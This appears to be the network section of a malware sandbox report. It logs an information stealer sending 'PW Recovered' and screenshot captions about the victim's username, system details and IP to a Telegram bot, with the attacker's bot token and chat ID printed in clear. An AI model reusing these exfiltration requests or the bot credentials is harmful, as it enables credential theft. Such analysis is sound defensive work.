                                                                  Apr 19, 2024 19:36:36.743484020 CEST49733443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:36.743511915 CEST44349733149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:36.967909098 CEST44349732149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:36.967983961 CEST49732443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:36.967998028 CEST44349732149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:36.968009949 CEST44349732149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:36.968115091 CEST49732443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:36.968898058 CEST49732443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.099170923 CEST49733443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.099208117 CEST44349733149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.099282980 CEST49733443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.099301100 CEST44349733149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.101715088 CEST49733443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.101743937 CEST44349733149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.160021067 CEST44349733149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.317538977 CEST49733443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.609344959 CEST49734443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.609415054 CEST44349734149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.609477997 CEST49734443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.609884024 CEST49734443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.609894991 CEST44349734149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.834934950 CEST44349733149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.835001945 CEST49733443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.835021019 CEST44349733149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.835032940 CEST44349733149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.835068941 CEST49733443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.836771965 CEST49733443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.900965929 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.901012897 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.901072979 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.901459932 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.901478052 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:37.907151937 CEST49734443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:37.952127934 CEST44349734149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.032993078 CEST44349734149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.033135891 CEST44349734149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.033201933 CEST49734443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:38.033741951 CEST49734443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:38.318274021 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.318496943 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:38.321377993 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:38.321394920 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.321779013 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.324091911 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:38.368125916 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.677090883 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:38.677129030 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.677607059 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:38.677625895 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.677823067 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:38.677839041 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.728374004 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:38.820691109 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:39.410235882 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:39.410305023 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:39.410327911 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:39.410343885 CEST44349735149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:39.410394907 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:39.410959005 CEST49735443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:41.364725113 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:41.364767075 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:41.364872932 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:41.365228891 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:41.365238905 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:41.789993048 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:41.791965008 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:41.791984081 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:42.149715900 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:42.149751902 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:42.150074959 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:42.150101900 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:42.150355101 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:42.150381088 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:42.206207037 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:42.333688021 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:42.917834044 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:42.917917967 CEST44349736149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:42.917947054 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:42.918068886 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:42.919720888 CEST49736443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:50.079829931 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:50.079879045 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:50.084121943 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:50.084121943 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:50.084167957 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:50.506361961 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:50.507925034 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:50.507946968 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:50.867882967 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:50.867919922 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:50.868026018 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:50.868046999 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:50.868153095 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:50.868185997 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:50.926700115 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:51.020596027 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:51.663280010 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:51.663330078 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:51.663345098 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:51.663358927 CEST44349737149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:51.663408995 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:51.663897038 CEST49737443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:55.376014948 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:55.376133919 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:55.376205921 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:55.376703978 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:55.376734018 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:55.803983927 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:55.806668043 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:55.806727886 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:56.161742926 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:56.161848068 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:56.169753075 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:56.169831038 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:56.173741102 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:56.173803091 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:56.223915100 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:56.333240986 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:56.898598909 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:56.898845911 CEST44349738149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:36:56.899373055 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:36:56.899373055 CEST49738443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.098566055 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.098627090 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.098762989 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.099195004 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.099222898 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.193020105 CEST49740443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.193065882 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.193130970 CEST49740443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.193521023 CEST49740443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.193533897 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.524112940 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.527358055 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.527457952 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.607883930 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.609946012 CEST49740443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.609965086 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.880309105 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.880389929 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.880515099 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.880554914 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.880649090 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.880712986 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.957851887 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.958271980 CEST49740443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.958304882 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.958384991 CEST49740443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.958395004 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:12.958475113 CEST49740443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:12.958504915 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:13.004965067 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:13.018131971 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:13.067512035 CEST49740443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:13.742862940 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:13.742939949 CEST44349739149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:13.742940903 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:13.742991924 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:13.743285894 CEST49739443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:13.808924913 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:13.808995962 CEST49740443192.168.2.5149.154.167.220
                                                                  Apr 19, 2024 19:37:13.808998108 CEST44349740149.154.167.220192.168.2.5
                                                                  Apr 19, 2024 19:37:13.809051991 CEST49740443192.168.2.5149.154.167.220

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 19, 2024 19:33:04.422277927 CEST5307653192.168.2.51.1.1.1
                                                                  Apr 19, 2024 19:33:04.527829885 CEST53530761.1.1.1192.168.2.5
                                                                  Apr 19, 2024 19:33:05.819991112 CEST5270753192.168.2.51.1.1.1
                                                                  Apr 19, 2024 19:33:05.925828934 CEST53527071.1.1.1192.168.2.5
                                                                  Apr 19, 2024 19:37:12.085498095 CEST5728053192.168.2.51.1.1.1
                                                                  Apr 19, 2024 19:37:12.192385912 CEST53572801.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Apr 19, 2024 19:33:04.422277927 CEST192.168.2.51.1.1.10x4003Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                  Apr 19, 2024 19:33:05.819991112 CEST192.168.2.51.1.1.10x56c9Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                  Apr 19, 2024 19:37:12.085498095 CEST192.168.2.51.1.1.10x8543Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Apr 19, 2024 19:33:04.527829885 CEST1.1.1.1192.168.2.50x4003No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                  Apr 19, 2024 19:33:04.527829885 CEST1.1.1.1192.168.2.50x4003No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                  Apr 19, 2024 19:33:04.527829885 CEST1.1.1.1192.168.2.50x4003No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                  Apr 19, 2024 19:33:05.925828934 CEST1.1.1.1192.168.2.50x56c9No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                  Apr 19, 2024 19:37:12.192385912 CEST1.1.1.1192.168.2.50x8543No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • api.ipify.org
                                                                  • api.telegram.org

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549705104.26.12.2054433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:33:04 UTC155OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                  Host: api.ipify.org
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:33:05 UTC211INHTTP/1.1 200 OK
                                                                  Date: Fri, 19 Apr 2024 17:33:05 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 12
                                                                  Connection: close
                                                                  Vary: Origin
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Server: cloudflare
                                                                  CF-RAY: 876ea33a0bb81363-ATL
                                                                  2024-04-19 17:33:05 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                  Data Ascii: 81.181.57.52


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549706149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:33:06 UTC260OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc60a788f191e0
                                                                  Host: api.telegram.org
                                                                  Content-Length: 971
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:33:06 UTC971OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 37 38 38 66 31 39 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 37 38 38 66 31 39 31 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 31 39 2f 32 30 32 34 20 31 39 3a 33 33 3a 30 35 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc60a788f191e0Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc60a788f191e0Content-Disposition: form-data; name="caption"New PW Recovered!Time: 04/19/2024 19:33:05User
                                                                  2024-04-19 17:33:06 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:33:07 UTC1115INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:33:06 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 727
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3318,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713547986,"document":{"file_name":"user-618321 2024-04-19 19-33-05.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIM9mYiqtL-K8bdpKuwa8f63o3UMu4VAAKnFwACi1IZUdt_S1JLSfEINAQ","file_unique_id":"AgADpxcAAotSGVE","file_size":348},"caption":"New PW Recovered!\n\nTime: 04/19/2024 19:33:05\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.549707104.26.12.2054437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:33:08 UTC155OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                  Host: api.ipify.org
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:33:08 UTC211INHTTP/1.1 200 OK
                                                                  Date: Fri, 19 Apr 2024 17:33:08 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 12
                                                                  Connection: close
                                                                  Vary: Origin
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Server: cloudflare
                                                                  CF-RAY: 876ea350caf8672b-ATL
                                                                  2024-04-19 17:33:08 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                  Data Ascii: 81.181.57.52


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.549708149.154.167.2204437324C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:33:09 UTC260OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc60a78b10ac3b
                                                                  Host: api.telegram.org
                                                                  Content-Length: 971
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:33:10 UTC971OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 37 38 62 31 30 61 63 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 37 38 62 31 30 61 63 33 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 31 39 2f 32 30 32 34 20 31 39 3a 33 33 3a 30 38 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc60a78b10ac3bContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc60a78b10ac3bContent-Disposition: form-data; name="caption"New PW Recovered!Time: 04/19/2024 19:33:08User
                                                                  2024-04-19 17:33:10 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:33:10 UTC1115INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:33:10 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 727
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3324,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713547990,"document":{"file_name":"user-618321 2024-04-19 19-33-08.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIM_GYiqtbS_aNeM0Sh8rUzTUMJRosKAAKpFwACi1IZUSdyn0NshDvlNAQ","file_unique_id":"AgADqRcAAotSGVE","file_size":348},"caption":"New PW Recovered!\n\nTime: 04/19/2024 19:33:08\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.549717149.154.167.2204433472C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:34:13 UTC238OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc641d35d1784c
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67144
                                                                  Expect: 100-continue
                                                                  2024-04-19 17:34:14 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 31 64 33 35 64 31 37 38 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 31 64 33 35 64 31 37 38 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 34 2f 32 30 32 34 20 30 35 3a 30 37 3a 35 39 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc641d35d1784cContent-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc641d35d1784cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 04/24/2024 05:07:59User
                                                                  2024-04-19 17:34:14 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
